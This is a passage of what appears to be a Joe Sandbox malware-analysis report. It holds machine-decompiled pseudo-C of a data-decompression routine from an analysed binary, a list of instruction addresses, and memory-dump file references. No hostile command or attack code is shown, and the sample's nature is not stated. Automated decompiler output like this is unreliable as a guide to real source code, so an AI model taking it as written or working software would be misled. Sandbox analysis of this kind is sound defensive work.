																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E00BBF300(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00BB38C2(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00BB1D92(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E00BAA740(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E00BAA740(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E00BBF300(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E00BB80CA(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E00BB80CA(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E00BAA740(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E00BB4B23(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E00BB3CDD(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00bb7034
0x00bb7038
0x00bb703e
0x00bb7067
0x00bb706a
0x00bb706f
0x00bb7072
0x00bb7059
0x00bb7059
0x00000000
0x00bb7074
0x00bb707f
0x00bb7082
0x00bb7085
0x00bb7089
0x00bb708d
0x00bb7091
0x00bb7093
0x00bb7095
0x00bb7095
0x00bb7099
0x00bb70a6
0x00bb70a6
0x00bb70ac
0x00bb70af
0x00bb70b1
0x00bb70b5
0x00000000
0x00000000
0x00bb70b7
0x00bb70b7
0x00bb70b9
0x00bb7644
0x00bb7644
0x00bb7646
0x00000000
0x00bb7647
0x00bb70bf
0x00bb70cd
0x00bb70cd
0x00bb70cf
0x00bb70de
0x00bb70de
0x00bb70e4
0x00bb7993
0x00bb7993
0x00000000
0x00bb7993
0x00000000
0x00bb70e4
0x00bb70d1
0x00bb70d8
0x00000000
0x00000000
0x00000000
0x00bb70d8
0x00bb70c4
0x00bb70c7
0x00000000
0x00000000
0x00000000
0x00bb70ea
0x00bb70ea
0x00bb70f7
0x00bb70fc
0x00bb7130
0x00bb7130
0x00bb7135
0x00bb713c
0x00bb7142
0x00bb7148
0x00bb714c
0x00bb7186
0x00bb7187
0x00bb7188
0x00bb718a
0x00bb71a3
0x00bb71a6
0x00bb71ad
0x00bb71b0
0x00bb71b3
0x00bb71bc
0x00bb71c5
0x00bb71c7
0x00bb71ca
0x00bb71cc
0x00bb71cc
0x00bb71ce
0x00bb71d6
0x00bb71d9
0x00bb71de
0x00bb71e0
0x00bb71f9
0x00bb71ff
0x00bb761b
0x00bb761d
0x00bb7650
0x00bb7656
0x00bb7772
0x00bb7772
0x00bb777b
0x00bb777e
0x00bb7780
0x00bb7784
0x00bb7793
0x00bb7793
0x00bb7796
0x00bb779b
0x00bb77a2
0x00bb77a8
0x00bb77ae
0x00bb77b5
0x00bb77e3
0x00bb77e4
0x00bb77e5
0x00bb77e7
0x00bb7803
0x00bb7806
0x00bb780d
0x00bb7810
0x00bb7813
0x00bb781f
0x00bb782b
0x00bb782d
0x00bb7833
0x00bb7835
0x00bb7835
0x00bb7837
0x00bb783f
0x00bb783f
0x00bb7842
0x00bb7845
0x00bb7856
0x00bb7859
0x00bb7859
0x00bb7847
0x00bb7847
0x00bb7847
0x00bb785b
0x00bb785e
0x00bb7860
0x00bb7865
0x00bb786c
0x00bb7874
0x00bb7876
0x00bb787d
0x00bb7880
0x00bb7880
0x00bb7883
0x00bb7883
0x00bb7886
0x00bb7891
0x00bb7895
0x00bb789a
0x00bb789d
0x00bb789f
0x00bb7953
0x00bb7953
0x00bb7956
0x00bb7958
0x00000000
0x00000000
0x00bb795e
0x00bb7964
0x00bb796a
0x00bb796f
0x00bb7973
0x00bb7979
0x00bb7982
0x00bb7985
0x00bb7985
0x00bb7985
0x00bb798a
0x00bb798a
0x00bb71f1
0x00bb71f1
0x00000000
0x00bb78a5
0x00bb78a5
0x00bb78a7
0x00000000
0x00000000
0x00bb78ad
0x00bb78b3
0x00bb78b5
0x00bb78bb
0x00bb78bf
0x00bb78c2
0x00bb78c6
0x00bb7918
0x00bb791b
0x00bb754f
0x00bb754f
0x00bb7552
0x00bb7554
0x00bb709e
0x00bb70a2
0x00bb70a2
0x00bb70a6
0x00bb70a6
0x00bb70ac
0x00bb70af
0x00bb70b1
0x00bb70b5
0x00000000
0x00000000
0x00000000
0x00bb70b5
0x00bb70a6
0x00bb755d
0x00bb755f
0x00bb7562
0x00bb7565
0x00000000
0x00000000
0x00bb756e
0x00bb7571
0x00bb7574
0x00bb7577
0x00000000
0x00000000
0x00bb7580
0x00bb7583
0x00bb7586
0x00bb7589
0x00000000
0x00000000
0x00bb7592
0x00bb7595
0x00bb7598
0x00bb759b
0x00000000
0x00000000
0x00bb75a4
0x00bb75a7
0x00bb75aa
0x00bb75ad
0x00000000
0x00000000
0x00bb75b6
0x00bb75b9
0x00bb75bd
0x00bb75c0
0x00bb75c3
0x00bb75cc
0x00bb75cf
0x00bb75cf
0x00000000
0x00bb75c3
0x00bb7923
0x00bb7923
0x00bb7926
0x00bb792a
0x00bb792c
0x00bb7930
0x00bb7935
0x00bb7939
0x00bb793c
0x00bb793f
0x00bb7942
0x00bb7945
0x00bb7949
0x00bb7949
0x00bb7949
0x00bb754b
0x00bb754b
0x00000000
0x00bb754b
0x00bb78c8
0x00bb78cb
0x00000000
0x00000000
0x00bb78d3
0x00bb78d3
0x00bb78d6
0x00bb78d9
0x00bb78dc
0x00bb78e1
0x00bb78e7
0x00bb78ed
0x00bb78f3
0x00bb78f9
0x00bb78ff
0x00bb7902
0x00bb7905
0x00bb7908
0x00bb790b
0x00bb790e
0x00bb790e
0x00bb790e
0x00000000
0x00bb7913
0x00bb789f
0x00bb77ef
0x00bb77f2
0x00bb77f2
0x00bb77f4
0x00000000
0x00000000
0x00bb77f6
0x00bb77f7
0x00bb77fa
0x00bb77fd
0x00000000
0x00000000
0x00000000
0x00bb77ff
0x00bb7801
0x00000000
0x00bb7801
0x00bb77b9
0x00bb77bc
0x00bb77c6
0x00bb77ce
0x00bb77d4
0x00bb77d7
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb7786
0x00bb7786
0x00bb7789
0x00bb778b
0x00bb778e
0x00bb778e
0x00bb778e
0x00000000
0x00bb7786
0x00bb765c
0x00bb765f
0x00bb7663
0x00bb7665
0x00bb717b
0x00bb717b
0x00000000
0x00bb717b
0x00bb766b
0x00bb766e
0x00bb7673
0x00bb7675
0x00bb767f
0x00bb7684
0x00bb7686
0x00bb7736
0x00bb7736
0x00bb7739
0x00bb773b
0x00000000
0x00000000
0x00bb7741
0x00bb7747
0x00bb774d
0x00bb7752
0x00bb7756
0x00bb775c
0x00bb7765
0x00bb7768
0x00bb7768
0x00bb7768
0x00000000
0x00bb776d
0x00bb768c
0x00bb768e
0x00000000
0x00000000
0x00bb7694
0x00bb769a
0x00bb769c
0x00bb76a2
0x00bb76a6
0x00bb76a9
0x00bb76ad
0x00bb76ff
0x00bb7702
0x00000000
0x00000000
0x00bb770a
0x00bb770a
0x00bb770d
0x00bb770f
0x00bb7713
0x00bb7718
0x00bb771c
0x00bb771f
0x00bb7722
0x00bb7725
0x00bb7728
0x00bb772c
0x00bb772c
0x00bb772c
0x00000000
0x00bb7731
0x00bb76af
0x00bb76b2
0x00000000
0x00000000
0x00bb76ba
0x00bb76ba
0x00bb76bd
0x00bb76c0
0x00bb76c3
0x00bb76c8
0x00bb76ce
0x00bb76d4
0x00bb76da
0x00bb76e0
0x00bb76e6
0x00bb76e9
0x00bb76ec
0x00bb76ef
0x00bb76f2
0x00bb76f5
0x00bb76f5
0x00bb76f5
0x00000000
0x00bb76fa
0x00bb7623
0x00bb7627
0x00bb762c
0x00bb762e
0x00000000
0x00000000
0x00bb7637
0x00bb763c
0x00bb763e
0x00000000
0x00000000
0x00000000
0x00bb763e
0x00bb7205
0x00bb720b
0x00bb720e
0x00bb721f
0x00bb7222
0x00bb7222
0x00bb7210
0x00bb7210
0x00bb7210
0x00bb7224
0x00bb7227
0x00bb7229
0x00bb7253
0x00bb722b
0x00bb722d
0x00bb7234
0x00bb723c
0x00bb723e
0x00bb7240
0x00bb7248
0x00bb724e
0x00bb724e
0x00bb7258
0x00bb725f
0x00bb7265
0x00bb726b
0x00bb7272
0x00bb72a0
0x00bb72a1
0x00bb72a2
0x00bb72a4
0x00bb72c0
0x00bb72c3
0x00bb72ca
0x00bb72cd
0x00bb72d0
0x00bb72dc
0x00bb72e8
0x00bb72ea
0x00bb72f0
0x00bb72f2
0x00bb72f2
0x00bb72f4
0x00000000
0x00bb72f4
0x00bb72ac
0x00bb72af
0x00bb72af
0x00bb72b1
0x00000000
0x00000000
0x00bb72b3
0x00bb72b4
0x00bb72b7
0x00bb72ba
0x00000000
0x00000000
0x00000000
0x00bb72bc
0x00bb72be
0x00000000
0x00bb7274
0x00bb7276
0x00bb7279
0x00bb7283
0x00bb728b
0x00bb7291
0x00bb7294
0x00bb72fc
0x00bb72fc
0x00bb72ff
0x00bb7302
0x00bb7312
0x00bb7315
0x00bb7315
0x00bb7304
0x00bb7304
0x00bb7304
0x00bb7317
0x00bb731b
0x00bb731e
0x00bb7322
0x00bb7324
0x00bb7328
0x00bb732a
0x00bb745b
0x00bb745b
0x00bb7461
0x00bb7463
0x00bb7464
0x00bb746a
0x00bb746c
0x00bb746d
0x00bb7473
0x00bb7475
0x00bb7475
0x00bb7475
0x00bb7473
0x00bb746a
0x00bb7479
0x00bb747f
0x00bb7485
0x00bb7488
0x00bb748b
0x00bb7496
0x00bb7498
0x00bb749d
0x00bb74a0
0x00bb74a4
0x00bb74a6
0x00bb75d7
0x00bb75d7
0x00bb75db
0x00bb75de
0x00bb75e0
0x00000000
0x00000000
0x00bb75e6
0x00bb75ec
0x00bb75f0
0x00bb75f6
0x00bb75fb
0x00bb75ff
0x00bb7605
0x00bb760e
0x00bb7611
0x00bb7611
0x00bb7611
0x00000000
0x00bb74ac
0x00bb74ac
0x00bb74ae
0x00000000
0x00000000
0x00bb74b4
0x00bb74ba
0x00bb74bd
0x00bb74c3
0x00bb74c7
0x00bb74ca
0x00bb74ce
0x00bb7519
0x00bb751c
0x00000000
0x00000000
0x00bb7520
0x00bb7520
0x00bb7523
0x00bb7527
0x00bb7529
0x00bb752d
0x00bb7532
0x00bb7536
0x00bb7539
0x00bb753c
0x00bb753f
0x00bb7542
0x00bb7546
0x00bb7546
0x00bb7546
0x00000000
0x00bb7529
0x00bb74d0
0x00bb74d3
0x00000000
0x00000000
0x00bb74d7
0x00bb74d7
0x00bb74da
0x00bb74dd
0x00bb74e0
0x00bb74e5
0x00bb74eb
0x00bb74f1
0x00bb74f7
0x00bb74fd
0x00bb7503
0x00bb7506
0x00bb7509
0x00bb750c
0x00bb750f
0x00bb7512
0x00bb7512
0x00bb7512
0x00000000
0x00bb7517
0x00bb7330
0x00bb7330
0x00bb7333
0x00bb742e
0x00bb7437
0x00bb7441
0x00bb7445
0x00bb744e
0x00bb7451
0x00bb7451
0x00bb7454
0x00bb7457
0x00bb7457
0x00000000
0x00bb7457
0x00bb7339
0x00bb736f
0x00bb733b
0x00bb733e
0x00bb7343
0x00bb734b
0x00bb7353
0x00bb7356
0x00bb735e
0x00bb7365
0x00bb736a
0x00bb736a
0x00bb7374
0x00bb737b
0x00bb7381
0x00bb7387
0x00bb738e
0x00bb73bc
0x00bb73bd
0x00bb73be
0x00bb73c2
0x00bb73c4
0x00bb73e2
0x00bb73e5
0x00bb73f1
0x00bb73f4
0x00bb73f8
0x00bb73fd
0x00bb7410
0x00bb7412
0x00bb7418
0x00bb741a
0x00bb741a
0x00bb741c
0x00000000
0x00bb741c
0x00bb73cc
0x00bb73cf
0x00bb73cf
0x00bb73d1
0x00000000
0x00000000
0x00bb73d3
0x00bb73d4
0x00bb73d7
0x00bb73da
0x00000000
0x00000000
0x00000000
0x00bb73dc
0x00bb73de
0x00000000
0x00bb7390
0x00bb7392
0x00bb7395
0x00bb739f
0x00bb73a7
0x00bb73ad
0x00bb73b0
0x00bb7424
0x00bb7427
0x00000000
0x00bb7427
0x00bb738e
0x00bb732a
0x00bb7272
0x00bb71eb
0x00bb71ee
0x00bb71ee
0x00bb71ee
0x00000000
0x00bb71ee
0x00bb718f
0x00bb7192
0x00bb7192
0x00bb7194
0x00000000
0x00000000
0x00bb7196
0x00bb7197
0x00bb719a
0x00bb719d
0x00000000
0x00000000
0x00000000
0x00bb719f
0x00bb71a1
0x00000000
0x00bb71a1
0x00bb7150
0x00bb7153
0x00bb715d
0x00bb7165
0x00bb716b
0x00bb716e
0x00bb7171
0x00000000
0x00bb7171
0x00bb70fe
0x00bb7101
0x00000000
0x00000000
0x00bb7105
0x00bb7110
0x00bb7116
0x00bb799f
0x00bb799f
0x00000000
0x00bb799f
0x00bb711c
0x00000000
0x00000000
0x00bb7124
0x00bb712a
0x00000000
0x00000000
0x00000000
0x00bb712a
0x00bb70a6
0x00bb7072
0x00bb7043
0x00bb7047
0x00bb704b
0x00bb704f
0x00bb7057
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

